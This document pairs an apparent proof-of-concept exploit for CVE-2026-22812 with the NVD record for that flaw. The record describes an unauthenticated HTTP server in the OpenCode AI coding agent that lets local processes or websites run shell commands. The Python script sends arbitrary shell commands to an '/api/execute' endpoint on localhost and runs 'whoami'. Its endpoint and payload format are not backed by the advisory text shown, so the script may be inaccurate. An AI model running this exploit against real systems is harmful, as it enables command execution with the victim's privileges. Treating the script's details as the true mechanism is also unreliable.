CVE-2026-22812

import requests import json # CVE-2026-22812 PoC - OpenCode Unauthenticated RCE # Target: OpenCode server running on localhost (default port 8080) TARGET_HOST = "http://localhost:8080" def execute_command(cmd): """ Execute arbitrary command on OpenCode server This exploits the unauthenticated HTTP server vulnerability """ try: # The vulnerable endpoint accepts command execution requests endpoint = f"{TARGET_HOST}/api/execute" payload = { "command": cmd, "shell": True } headers = { "Content-Type": "application/json" } response = requests.post(endpoint, json=payload, headers=headers) if response.status_code == 200: result = response.json() return result.get("output", "") else: return f"Error: {response.status_code}" except Exception as e: return f"Connection failed: {str(e)}" def check_vulnerability(): """Check if target is vulnerable""" try: response = requests.get(f"{TARGET_HOST}/api/status") return response.status_code == 200 except: return False if __name__ == "__main__": print("[*] CVE-2026-22812 OpenCode RCE PoC") print("[*] Checking vulnerability...") if check_vulnerability(): print("[+] Target is vulnerable!") print("[*] Executing test command...") result = execute_command("whoami") print(f"[+] Result: {result}") else: print("[-] Target is not vulnerable or not accessible")

{"cve": {"id": "CVE-2026-22812", "sourceIdentifier": "[email protected]", "published": "2026-01-12T23:15:53.370", "lastModified": "2026-01-21T15:14:59.607", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenCode is an open source AI coding agent. Prior to 1.0.216, OpenCode automatically starts an unauthenticated HTTP server that allows any local process (or any website via permissive CORS) to execute arbitrary shell commands with the user's privileges. This vulnerability is fixed in 1.0.216."}, {"lang": "es", "value": "OpenCode es un agente de codificación de IA de código abierto. Antes de la 1.0.216, OpenCode inicia automáticamente un servidor HTTP no autenticado que permite a cualquier proceso local (o a cualquier sitio web a través de CORS permisivo) ejecutar comandos de shell arbitrarios con los privilegios del usuario. Esta vulnerabilidad está corregida en la 1.0.216."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}, {"lang": "en", "value": "CWE-749"}, {"lang": "en", "value": "CWE-942"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:anoma:opencode:*:*:*:*:*:-:*:*", "versionEndExcluding": "1.0.216", "matchCriteriaId": "168EE682-3321-4383-8874-2C9D8B949A2F"}]}]}], "references": [{"url": "https://github.com/anomalyco/opencode/security/advisories/GHSA-vxw4-wv6m-9hhh", "source": "[email protected]", "tags": ["Vendor Advisory", "Exploit"]}, {"url": "https://github.com/anomalyco/opencode/security/advisories/GHSA-vxw4-wv6m-9hhh", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Vendor Advisory", "Exploit"]}]}}